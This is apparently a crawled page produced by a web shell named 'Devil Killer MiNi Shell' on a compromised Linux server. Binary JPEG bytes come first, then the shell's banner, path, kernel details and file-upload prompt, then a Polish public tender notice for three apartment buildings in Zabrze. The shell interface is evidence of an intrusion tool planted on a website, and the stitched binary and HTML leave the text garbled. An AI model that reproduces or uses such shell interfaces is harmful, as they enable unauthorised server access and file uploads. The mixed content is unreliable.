JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170224/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170224/31843-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.mtbstg.pl' target='_blank'>http://www.mtbstg.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 31843 - 2017
              z dnia 2017-02-24 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Tarnowskie Góry: BUDOWA TRZECH BUDYNKÓW MIESZKALNYCH WIELORODZINNYCH NR 4, 6, 7 PRZY UL. ŻYWIECKIEJ W ZABRZU WRAZ Z NIEZBĘDNĄ INFRASTRUKTURĄ I PARKINGIEM<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Międzygminne Towarzystwo Budownictwa Społecznego Sp. z o.o., krajowy numer identyfikacyjny
              27215700900000, ul.
              ul. Towarowa 
              1,
              42600  
              Tarnowskie Góry, woj.
              śląskie, państwo
              Polska, tel.
              (032) 3809006, 3809031, e-mail
              mtbstg@pn.pl, faks
              (032) 380 90 18.
              <br />
              Adres strony internetowej (URL): www.mtbstg.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Spółka ze 100% udziałem Gmin</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.mtbstg.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.mtbstg.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferta musi być napisana na maszynie do pisania, komputerze lub nieścieralnym atramentem. Oferty składane są w nieprzejrzystej i zamkniętej kopercie lub opakowaniu. Koperta powinna być opisana zgodnie z instrukcją zawartą w SIWZ. Oferty nadesłane pocztą/kurierem będą zakwalifikowane do postępowania przetargowego pod warunkiem ich dostarczenia do terminu określonego w SIWZ<br />
                Adres:
                <br />Międzygminne Towarzystwo Budownictwa Społecznego Sp. z o. o., ul. Towarowa 1, 42-600 Tarnowskie Góry, Sekretariat, pok. 203</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>BUDOWA TRZECH BUDYNKÓW MIESZKALNYCH WIELORODZINNYCH NR 4, 6, 7 PRZY UL. ŻYWIECKIEJ W ZABRZU WRAZ Z NIEZBĘDNĄ INFRASTRUKTURĄ I PARKINGIEM<br /><b>Numer referencyjny: </b>2/2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem niniejszego zamówienia jest budowa trzech wielorodzinnych budynków mieszkalnych nr 4, 6 i 7 przy ul. Żywieckiej w Zabrzu wraz z niezbędną infrastrukturą, budową parkingu oraz z uzyskaniem pozwolenia na użytkowanie. Inwestycja jest kontynuacją przedsięwzięcia obejmującego budowę zespołu 12 budynków mieszkalnych wielorodzinnych przy ul. Żywieckiej w Zabrzu. Teren projektowanej inwestycji zlokalizowany jest po zachodniej stronie ul. Żywieckiej i ograniczony jest od północy działkami zabudowy jednorodzinnej, a od południa istniejącym ciekiem wodnym. Przedmiotowe zadanie stanowi centralny fragment terenu całego przedsięwzięcia.  

Podział zamówienia na części:

CZĘŚĆ I: Budowa trzech budynków mieszkalnych o numerach projektowych 4, 6 i 7 z przyłączami

I.Charakterystyka budynków
Budynki mieszkalne wielorodzinne, w układzie: budynek nr 4 dwuklatkowy, niepodpiwniczony, trzykondygnacyjny;  budynki nr 6 i 7 jednoklatkowe trzykondygnacyjne.  Na parterze w każdym z budynków przewidziano lokale mieszkalne oraz pomieszczenia techniczne i gospodarcze (komórki lokatorskie, wózki i rowery, suszarnie).
Architektura budynków prosta, określona między innymi eksponowanymi płaszczyznami prostych rozalitów i wykuszy oraz dachu płaskiego. Materiał elewacji to głównie kolorowy tynk akrylowy oraz płytki elewacyjne elastyczne.
Rozwiązania konstrukcyjno-materiałowe dla budynków to: 
ławy żelbetowe, 
ze względu na konieczność ocieplenia fundamentów styropianem XPS gr. 8cm należy stosować hydroizolacyjne preparaty bezrozpuszczalnikowe; izolację poziomą parteru stanowić będzie folia hydroizolacyjna (2x) gr. 1mm; izolację pionową ścian fundamentowych wykonać należy z masy asfaltowo-kauczukowej bezrozpuszczalnikowej, wzmocnionej welonem szklanym z osłoną z płyt polistyrenowych XPS gr. 8 cm; izolację pionowa należy połączyć z poziomą na zakład min. 50 cm,
izolację posadzki w pomieszczeniach sanitarnych (łazienka, wc, kuchnia) wykonać z folii hydroizolacyjnej zbrojonej siatką szklaną (2x) lub powłoki przeciwwilgociowej np. AQUAFIN  2K. 
izolacja balkonów jak wyżej,
ściany nośne z pustaków ceramicznych poryzowanych gr. 25 cm np. porotherm, 
izolacja termiczna ścian zewnętrznych ocieplone styropianem EPS 70  040 FASADA  gr. 15 cm, wieńce, nadproża i rdzenie żelbetowe ocieplone wkładami styropianowymi gr. 15 cm; ościeżyny otworów okiennych i drzwi zewnętrznych ocieplone styropianem EPS70  040  gr. 3 cm; dach  kliny dachowe ze styropianu EPS 100  038, wierzchnia warstwa ze styropianu EPS 200  038   gr. 200  gr. Łączna grubość styropianu (średnio) 45cm
izolacja termiczna podłogi na gruncie  styropian EPS 200  037 DACH/PODŁOGA gr. 12 cm.
stropy żelbetowe monolityczne gr. 18 cm,
płytki ceramiczne w komórkach lokatorskich i klatce schodowej,
płytki elewacyjne elastyczne, paroprzepuszczalne, na kleju dyspersyjnym (na oklejonych powierzchniach nie mogą pojawiać się białe wykwity solne) 
ściany ciągów komunikacyjnych - tynki wewnętrzne gipsowe zatarte na gładko, malowane,
konstrukcja balkonu  w budynku nr 4 dostawiana do budynku (na słupach stalowych płyty żelbetowe prefabrykowane gr. 8-10 cm), w budynkach nr 6 i 7 żelbetowe monolityczne
konstrukcja balkonów dostawiana do budynków (na słupach stalowych płyty żelbetowe prefabrykowane gr. 8-10 cm),
balkony oraz tarasy wykafelkowane oraz otynkowane od spodu,
pokrycie dachowe dwuwarstwowe. Papa podkładowa asfaltowa samoprzylepna modyfikowana elastomerami SBS na osnowie z włókniny poliestrowej np. PLASTER P -180/2000. Papa termozgrzewalna wierzchniego krycia z wysokiej jakości asfaltów modyfikowanych elastomerami SBS na osnowie z włókniny poliestrowej o dużej gramaturze, wysokiej elastyczności i bardzo dużej wytrzymałości na rozerwanie np. Czarna Mamba Max PYE 250 S52H
okna PCV o współczynniku przenikania ciepła U=1,1 W/m2K (dla całego okna),
drzwi zewnętrzne aluminiowe  o współczynniku przenikania ciepła U=1,5 W/m2K (dla całych drzwi),
tynki wewnętrzne gipsowe,
ciepło i ciepła woda dostarczane z lokalnych kotłowni gazowych zlokalizowanych w każdym  budynku,
wewnętrzna instalacja RTV SAT, DVBT i teletechniczna w każdym budynku kompletna instalacja wewnętrzna wraz z rozprowadzeniem po wszystkich lokalach mieszkalnych w budynku, kompletna antena zbiorcza przystosowana do odbioru cyfrowej telewizji naziemnej oraz cyfrowej telewizji satelitarnej  
wewnętrzna instalacja domofonowa,
należy założyć dostarczenie oraz montaż skrzynek na listy przynależnej dla każdego z mieszkań oraz jedną dla potrzeb administracyjnych,
dla każdego budynku należy wykonać drenaż opaskowy
opaski wokół budynków  z płytek chodnikowych
przyłącza wodociągowe z rur polietylenowych (HDPD) o śr. nominalnej 63 mm  -     dł. 60m
przyłącza do kanalizacji sanitarnej  z rur PVC o śr. zewn. 160 mm  SDR - 34  -  dł. 58,20 m;  
przyłącza do kanalizacji deszczowej:  z rur PVC o śr. zewn. 160 mm   dł. 77,40 m; z rur PVC o śr. 200  127,10 m

II.Dane techniczno-użytkowe projektowanych budynków.
a)Budynek nr 4 o powierzchni całkowitej netto 826,37 m2, składa się w sumie z 11 mieszkań, w tym czterech 3-pokojowych, sześciu 2-pokojowych  oraz jednego 1-pokojowego, co daje w sumie powierzchnię użytkowa mieszkań 660,91 m2. Kubatura budynku brutto to 3.425,00 m2.
b)Budynek nr 6 o powierzchni całkowitej netto 733,89 m2, składa się w sumie z 10 mieszkań, w tym dziewięciu 2-pokojowych  oraz jednego 1-pokojowego dla osoby niepełnosprawnej, co daje w sumie powierzchnię użytkowa mieszkań 574,79 m2. Kubatura budynku brutto to 2.819,00 m2.
c)Budynek nr 7 o powierzchni całkowitej netto 733,91 m2, składa się w sumie z 10 mieszkań, w tym jednego 3-pokojowego oraz dziewięciu 2-pokojowych, co daje w sumie powierzchnię użytkowa mieszkań 571,58 m2. Kubatura budynku brutto to 2.819,00 m2.

III.Przedmiotem zamówienia podstawowego objęte są następujące elementy stanu wykończeniowego lokali mieszkalnych wewnętrznego i zewnętrznego.
tynki wewnętrzne gipsowe zatarte na gładko,
stolarka okienna PCV, zestaw szybowy jednokomorowy o współczynniku przenikania ciepła U=1,1 W/m2K. W oknach należy zamontować (u producenta lub na budowie) nawiewniki higrosterowane w górnym ramieniu skrzydła okiennego
ściany jednokrotnie malowane 
stolarka drzwiowa wewnętrzna drzwi płytowe okleinowe
drzwi wewnętrzne do mieszkań antywłamaniowe
elewacje z gotowej masy tynkarskiej sylikatowej
posadzki w pomieszczeniach mieszkalnych  panele podłogowe w pokojach; płytki ceramiczne z izolacją w kuchni, łazience i wc; płytki ceramiczne w przedpokoju;
okładziny ścienne  płytki ceramiczne w kuchni, łazience i wc;
montaż wyposażenia łazienki i wc w urządzenia sanitarne - umywalka łazienkowa z półpostumentem na stelażu, umywalka łazienkowa z postumentem na stelażu, miska ustępowa na stelażu, wanna z obudową z PCV, 

CZĘŚĆ II: Budowa sieci wodociągowych, kanalizacji sanitarnej i deszczowej, oświetlenia terenu w zakresie umożliwiającym funkcjonowanie budynków nr 4, 6, 7  zgodnie z przeznaczeniem oraz budowa parkingu i drogi wewnętrznej
Obsługa komunikacyjna projektowanych budynków odbywać się będzie przez projektowaną kontynuację drogi wewnętrznej z wykonanym zjazdem na ul. Żywiecką. Projektowany układ drogowy zapewnia dojazd do wejść do budynków, parkingów z kostki brukowej. Łączna ilość miejsc parkingowych do wykonania to 48, w tym 1 dla osoby niepełnosprawnej.

I.Infrastruktura techniczna

Infrastruktura  drogowa 
drogi z betonowej kostki  brukowej gr. 8 cm  - 1352,16 m2
parkingi z betonowej kostki  brukowej gr. 8 cm  940,48 m2
chodniki z betonowej kostki  brukowej gr. 8 cm  1608,56 m2

Sieci wod-kan
sieć wodociągowa z rur polietylenowych (HDPD) o śr. nominalnej 110 mm  228 m; 2 studnie wodomierzowe z wyposażeniem.
kanalizacja sanitarna z rur PVC śr. zewn. 200 mm  SDR - 34   135,40 m; 9 studni rewizyjnych z kręgów betonowych o śr. 1200 mm
kanalizacja deszczowa z rur PVC o śr. zewn. 200 mm  dł.  248,00 m; kanalizacja z rur PVC 0 śr. 250 mm  dł. 172,30 m; 26 studnie rewizyjnych z kręgów betonowych o śr. 1200 mm; 8 studzienek  kanalizacyjnych  systemowych  o śr. 600 mm.

Oświetlenie terenu
7 słupów oświetleniowych ocynkowanych; oprawy typu OCP-70 PC/II; kabel elektroenergetyczny 1 kV typu 3x4 mm2
                
Zagospodarowanie terenu
wykonanie zieleni zgodnie z projektem zieleni w granicach zakresu
1 obudowa śmietnika; 
6  koszy na śmieci; 
7 ławek (identycznych jak aktualnie istniejące przy sąsiadujących budynkach); 
1 plac zabaw z wyposażeniem 
<br /><br /><b>II.5) Główny kod CPV: </b>45200000-9<br /><b> Dodatkowe kody CPV:</b>45211340-4,
                45330000-9,
                45331100-7,
                45310000-3,
                45320000-6,
                45421100-5,
                45430000-0,
                45410000-4,
                45230000-8,
                45233100-0<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 18<br /></div><div style="padding-left: 20px">
                    Okres w miesiącach: 14<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Część I zamówienia należy zrealizować w terminie maksymalnie 18 miesięcy od daty zawarcia umowy.
Część II zamówienia należy zrealizować w terminie maksymalnie 14 miesięcy od daty zawarcia umowy.
</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca musi wykazać, iż posiada środki finansowe lub zdolność kredytową, w wysokości nie mniejszej niż: 
dla Części I zamówienia  2.300.000,00 zł (słownie: dwa milion trzysta tysięcy złotych 00/100),
dla Części II zamówienia -  700.000,00 zł (słownie: siedemset tysięcy złotych 00/100),
W przypadku ubiegania się o zamówienie dla obu części zamówienia Wykonawca musi wykazać, iż posiada środki finansowe lub zdolność kredytową będącą sumą kwot wyżej wymienionych.


Wykonawca musi wykazać, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzenia działalności związanej z przedmiotem zamówienia (dotyczy wartości dla podlimitu związanego z wykonywaniem robót budowlano montażowych) w wysokości co najmniej:
dla Części I zamówienia  3.000.000,00 zł (słownie: trzy miliony złotych 00/100),
dla Części II zamówienia -  1.000.000,00 zł (słownie: jeden milion złotych 00/100),
W przypadku ubiegania się o zamówienie dla obu części zamówienia Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, jako suma kwot wyżej wymienionych.
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Wykonawca musi wykazać, iż w okresie ostatnich 5 lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  tym okresie, wykonał  należycie:
dla Części I zamówienia: co najmniej dwie roboty budowlane odpowiadające rodzajem i wartością przedmiotowi zamówienia, polegające na budowie budynku mieszkalnego wielorodzinnego zrealizowanego w technologii tradycyjnej, co najmniej 10-rodzinnego z co najmniej trzema kondygnacjami i kubaturze 3000m3
dla Części II zamówienia: co najmniej jedną robotę budowlaną polegającą na budowie parkingu i drogi z betonowej kostki brukowej o powierzchni 1000m2 oraz budowie kanalizacji sanitarnej, deszczowej i sieci wodociągowej
Za zakończenie roboty budowlanej należy rozumieć podpisanie protokołu odbioru końcowego lub równoważnego dokumentu
W przypadku ubiegania się o zamówienie dla obu części zamówienia Wykonawca musi wykazać należyte wykonanie obu wyżej wymienionych zakresów prac.


Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) osobami niezbędnymi do wykonania  niniejszego zamówienia: tj.: posiadającymi aktualne uprawnienia budowlane do kierowania robotami budowlanymi w specjalności:
a) dla Części I:
konstrukcyjno-budowlanej bez ograniczeń (kierownik budowy)  1 osoba
instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń elektrycznych oraz elektroenergetycznych (kierownik robót elektrycznych  1 osoba
instalacyjnej bez ograniczeń w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych (kierownik robót sanitarnych)  1 osoba
inżynieryjnej drogowej bez ograniczeń (kierownik robót drogowych)  1 osoba
b) dla Części II:
inżynieryjnej drogowej bez ograniczeń (kierownik robót drogowych)  1 osoba
W przypadku ubiegania się o zamówienie dla obu części zamówienia Wykonawca musi wykazać dysponowanie osobami jak dla Części I
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                Wykonawca, którego oferta zostanie najwyżej oceniona w celu wykazania spełniania warunków udziału w postępowaniu, zostanie wezwany do przedłożenia następujących oświadczeń i dokumentów (aktualnych na dzień złożenia oświadczeń lub dokumentów):
w celu wykazania spełniania warunku Sytuacja ekonomiczna lub finansowa:
potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego;
informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu;
Uwaga! Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez Zamawiającego dokumentów, o których mowa jw., Zamawiający dopuszcza złożenie przez wykonawcę innych dokumentów, o których mowa w art. 26 ust. 2c ustawy Pzp


w celu wykazania spełniania warunku Zdolność techniczna lub zawodowa:
wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone (wzór wykazu stanowi załącznik nr 4 do  SIWZ);
Uwaga! Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty. 
wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór wykazu stanowi załącznik nr 5 do  SIWZ).
</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
